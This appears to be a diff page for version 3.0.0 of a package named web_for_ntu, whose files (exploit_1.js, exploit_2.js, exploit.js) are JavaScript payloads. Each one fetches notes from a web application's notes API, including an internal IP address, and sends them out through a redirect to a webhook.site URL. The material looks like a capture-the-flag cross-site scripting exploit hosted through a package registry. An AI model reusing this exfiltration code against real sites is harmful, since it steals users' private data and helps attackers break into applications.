web_for_ntu 2.0.0 → 3.0.0
Sign up to get free protection for your applications and to get access to all the features.
- package/exploit_1.js +9 -0
- package/exploit_2.js +2 -2
- package/package.json +1 -1
- package/exploit.js +0 -10
package/exploit_1.js
ADDED
@@ -0,0 +1,9 @@
|
|
1
|
+
function leakAllNote() {
|
2
|
+
fetch('/api/notes/all')
|
3
|
+
.then(response => response.json())
|
4
|
+
.then(notes => {
|
5
|
+
window.parent.location.href = `https://webhook.site/7b314372-817b-4fbd-a459-8c71d3be3bbd?` + encodeURIComponent(notes[0].id);
|
6
|
+
})
|
7
|
+
.catch(error => console.error('Error:', error));
|
8
|
+
}
|
9
|
+
leakAllNote();
|
package/exploit_2.js
CHANGED
@@ -1,4 +1,4 @@
|
|
1
|
-
function
|
1
|
+
function leakNoteWithID() {
|
2
2
|
fetch('/api/notes?id=a83ed14e-8c1c-43c3-ad7a-b5393ad85a3d')
|
3
3
|
.then(response => response.json())
|
4
4
|
.then(note => {
|
@@ -6,4 +6,4 @@ function leakDataFromEndpoint() {
|
|
6
6
|
})
|
7
7
|
.catch(error => console.error('Error:', error));
|
8
8
|
}
|
9
|
-
|
9
|
+
leakNoteWithID();
|
package/package.json
CHANGED
package/exploit.js
DELETED
@@ -1,10 +0,0 @@
|
|
1
|
-
function leakDataFromEndpoint() {
|
2
|
-
fetch('http://10.113.184.121:10082/api/notes/all')
|
3
|
-
.then(response => response.json())
|
4
|
-
.then(data => {
|
5
|
-
const queryParams = new URLSearchParams({data: JSON.stringify(data)}).toString();
|
6
|
-
window.parent.location.href = `https://webhook.site/7b314372-817b-4fbd-a459-8c71d3be3bbd?${queryParams}`;
|
7
|
-
})
|
8
|
-
.catch(error => console.error('Error:', error));
|
9
|
-
}
|
10
|
-
leakDataFromEndpoint();
|